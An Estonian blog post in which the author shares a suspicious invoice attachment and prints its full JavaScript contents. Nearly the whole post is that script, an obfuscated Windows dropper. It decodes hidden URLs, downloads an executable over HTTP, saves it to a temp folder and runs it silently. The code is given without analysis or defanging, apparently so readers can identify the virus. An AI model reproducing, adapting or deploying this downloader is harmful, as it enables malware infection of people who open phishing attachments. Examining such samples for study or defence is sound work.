teisipäev, märts 01, 2016

Väga huvitav skript

Täna saadeti mulle unpayedinvoice.zip ja ma mõtlesin, et vaatan, mis viirusega tegu on. Fail nimega invoice_copy.js sisaldas sellist sisu. Mis te arvate?
Puust ette ja punaseks selgitavad asja lahti digitunni vennad 14. märtsi digitunnis .


function JRNjcvOci(nRFJaMTEtkN) {
var AyUtpmIg = WScript.CreateObject("Wscript.Shell");
AyUtpmIg.Run(nRFJaMTEtkN, 0x1, 0x0);
}
function xibHINjNj(eBgKp,cboWC,cyScP) {
var lHSUW = "nyiLdf Xrs pt.Shell xzqCzIi Scri".split(" ");
var ElE=((1)?"W" + lHSUW[4]:"")+lHSUW[2];
var HT = WScript.CreateObject(ElE);
var ih = "%TEMP%\\";
return HT.ExpandEnvironmentStrings(ih);
}
function YPTRehyF() {
var qdpvfWq = "ipting";
var woQuoCrNBc = "ile";
var QMXYe = "System";
return "Sc" + "r" + qdpvfWq + ".F" + woQuoCrNBc + QMXYe + "Obj" + "ect";
}
function tDct(QtpLn) {
return WScript.CreateObject(QtpLn);
}
function MgCR(UtZEp,SOxUA) {
UtZEp.write(SOxUA);
}
function lMOH(gokah) {
gokah.open();
}
function Fxqi(ZJKbg,ofEzE) {
ZJKbg.saveToFile(ofEzE,682-680);
}
function SZjM(ywnEe,iudkY,PuDkm) {
ywnEe.open(PuDkm,iudkY,false);
}
function kDfm(aiNgt) {
if (aiNgt == 1035-835){return true;} else {return false;}
}
function EBbH(UjHnC) {
if (UjHnC > 191622-362){return true;} else {return false;}
}
function wLgr(ncTyQ) {
var cgpjK="";
for(V=(533-533); V < ncTyQ.length; V++)
if (V % (738-736) != (433-433)) {
cgpjK += ncTyQ.substr(V, 291-290);
}
return cgpjK;
}
function OCSS(CzLUk) {
CzLUk.send();
}
function QwyG(uPQFC) {
return uPQFC.status;
}
function OeUQd(xbdfsH) {
return new ActiveXObject(xbdfsH);
}
var Db="komh1edlMl0oRwwrtumf4fF.ScboEmO T/p8a0n.8eHxmed?B DtHhEifs2iqsBi2t6saqpqO.EcEoxm3/28j03.LekxHe6?l k?X M?T M?";
var A = wLgr(Db).split(" ");
var Jjf = xibHINjNj("nzqF","YdSvU","ZAGPHC");
var FkM = OeUQd(YPTRehyF());
var aAIS = Jjf+"VexneEA\\";
try{
FkM.CreateFolder(aAIS);
}catch(rFGJNs){
};
var yuR = "2.XMLH";
var JDs = (yuR + "TTP" + " waRZkkS ooTJO XML ream St xGZpmyvy AD AKYgRrM OD").split(" ");
var uX = true  , QOsC = JDs[7] + "" + JDs[9];
var MK = tDct("MS"+JDs[3]+(628815, JDs[0]));
var gul = tDct(QOsC + "B." + JDs[5]+(973688, JDs[4]));
var qyN = 0;
var u = 1;
var meCiIvf = 463705;
var n=qyN;
while (true)  {
if(n>=A.length) {break;}
var Xk = 0;
var ROD = ("ht" + " PEFRBeU tp wtSLT JoELKzBC :// ziQIOOu .e xe G ET").split(" ");
try  {
SZjM(MK,ROD[0]+ROD[2]+ROD[5]+A[n]+u, ROD[9]+ROD[10]); OCSS(MK); if (kDfm(QwyG(MK)))  {    
lMOH(gul); gul.type = 1; MgCR(gul,MK.responseBody); if (EBbH(gul.size))  {
Xk = 1; gul.position = 0; Fxqi(gul,/*z6W830ly5m*/aAIS/*OeNt139vh5*/+meCiIvf+ROD[7]+ROD[8]); try  {
if (((new Date())>0,7954910888)) {
JRNjcvOci(aAIS+meCiIvf+/*Yxme15SsMQ*/ROD[7]+ROD[8]/*ig6y53wbkI*/);
break;
}
}
catch (Vn)  {
};
}; gul.close();
};
if (Xk == 1)  {
qyN = n; break;
};
}
catch (Vn)  {
};
n++;
};

Thanks for visit !